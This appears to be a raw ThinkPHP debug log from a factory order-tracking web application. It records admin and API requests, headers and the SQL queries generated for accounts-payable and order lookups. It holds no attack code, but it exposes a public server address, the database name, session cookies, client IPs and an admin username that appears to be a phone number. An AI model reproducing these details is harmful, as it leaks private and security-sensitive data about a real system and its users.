/alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000158s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000505s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001412s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000507s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001659s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001348s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001791s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000365s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001402s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001119s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001369s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.001359s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.003628s ] --------------------------------------------------------------- [ 2022-07-20T17:12:01+08:00 ] 106.112.205.110 POST /admin/financial/accountspayable/getTotal [ info ] 47.105.33.115:8081/admin/financial/accountspayable/getTotal [运行时间:0.115550s][吞吐率:8.65req/s] [内存消耗:5,438.78kb] [文件加载:87] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001211s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'getTotal', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '33', 'accept' => '*/*', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'suppliercustomername' => '', 'workername' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001693s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->getTotal[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.009858s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000467s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001482s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000400s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001246s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.000983s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.000970s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del,sum(accountspayable.money) as totalMoney FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.001650s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del,sum(accountspayable.paid_money) as totalMoney FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.001860s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001643s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"suppliercustomername\":\"\",\"workername\":\"\"}' , '/admin/financial/accountspayable/getTotal' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308321) [ RunTime:0.006710s ] --------------------------------------------------------------- [ 2022-07-20T17:12:01+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018907s][吞吐率:52.89req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000058s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001084s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:01+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021300s][吞吐率:46.95req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001327s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:02+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.022689s][吞吐率:44.07req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000064s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001266s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:02+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021197s][吞吐率:47.18req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001253s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:02+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.031396s][吞吐率:31.85req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000059s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001799s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:02+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018549s][吞吐率:53.91req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001049s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:02+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019551s][吞吐率:51.15req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001318s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:02+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019525s][吞吐率:51.22req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001085s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:02+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021121s][吞吐率:47.35req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001118s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:03+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020102s][吞吐率:49.75req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001246s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:03+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/add?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/add?dialog=1 [运行时间:0.053240s][吞吐率:18.78req/s] [内存消耗:5,260.68kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001119s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'add', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'dialog' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001754s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->add[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/accountspayable/add.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'subjectTypeList', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000113s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000543s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001641s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000442s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001103s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001255s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001618s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000406s ] --------------------------------------------------------------- [ 2022-07-20T17:12:03+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=0&pageNum=10 [运行时间:0.054461s][吞吐率:18.36req/s] [内存消耗:4,769.87kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001278s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001673s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000856s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001466s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000365s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001668s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001110s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS 